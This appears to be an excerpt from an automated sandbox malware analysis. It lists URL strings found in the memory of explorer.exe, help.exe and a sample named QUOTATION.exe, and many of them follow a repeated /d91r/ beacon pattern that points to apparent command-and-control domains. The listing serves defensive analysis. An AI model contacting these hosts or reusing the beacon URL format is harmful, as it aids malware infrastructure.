Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brightfms.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000002.8041134967.0000000015AE0000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000055A0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.brightfms.com/d91r/?8H7gL=Bxcfm_qbbEGm&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhd
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brightfms.comwww.eta-trader.net
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buymyenergy.com
Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buymyenergy.com/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buymyenergy.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.buymyenergy.comwww.184411.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cardinialethanol.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cardinialethanol.com/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cardinialethanol.comwww.flaviosilva.online
Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dexmart.xyz
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dexmart.xyz/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dexmart.xyz/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dexmart.xyzwww.finelinetackdirect.com
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dhiyasecurities.com
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dhiyasecurities.com/d91r/
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dhiyasecurities.com/d91r/ldE8Xu=oYWDxG4UFF1
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dhiyasecurities.comwww.popularartprints.org
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eta-trader.net
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eta-trader.net/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eta-trader.net/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eta-trader.netwww.funvacayflorida.com
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fantasticserver.yachts
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fantasticserver.yachts/d91r/
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fantasticserver.yachts/d91r/ldE8Xu=oYWDxG4UFF1
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fantasticserver.yachtswww.dhiyasecurities.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.finelinetackdirect.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.finelinetackdirect.com/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.finelinetackdirect.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.finelinetackdirect.comwww.maxhaidt.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flaviosilva.online
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flaviosilva.online/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.flaviosilva.onlinewww.solya-shop.com
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.funvacayflorida.com
Source: help.exe, 0000000A.00000002.8005674246.00000000058C4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPtQiCFpqnDhHGDoC
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.funvacayflorida.com/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.funvacayflorida.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.funvacayflorida.comT
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ghostdyes.net
Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ghostdyes.net/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ghostdyes.net/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ghostdyes.netd&www.aznqmd.com
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ghostdyes.netwww.aznqmd.com
Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.interactive-media.ru
Source: explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.interactive-media.ru/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.interactive-media.ruwww.cardinialethanol.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.com
Source: explorer.exe, 00000009.00000002.8041134967.0000000015498000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004F58000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.com/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.com/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.com/d91r/ldE8Xu=oYWDxG4UFF1
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.comwww.aznqmd.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.comwww.ghostdyes.net
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.maxhaidt.comwww.maxhaidt.com
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://www.nero.com
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popularartprints.org
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popularartprints.org/d91r/
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popularartprints.org/d91r/ldE8Xu=oYWDxG4UFF1
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popularartprints.orgT
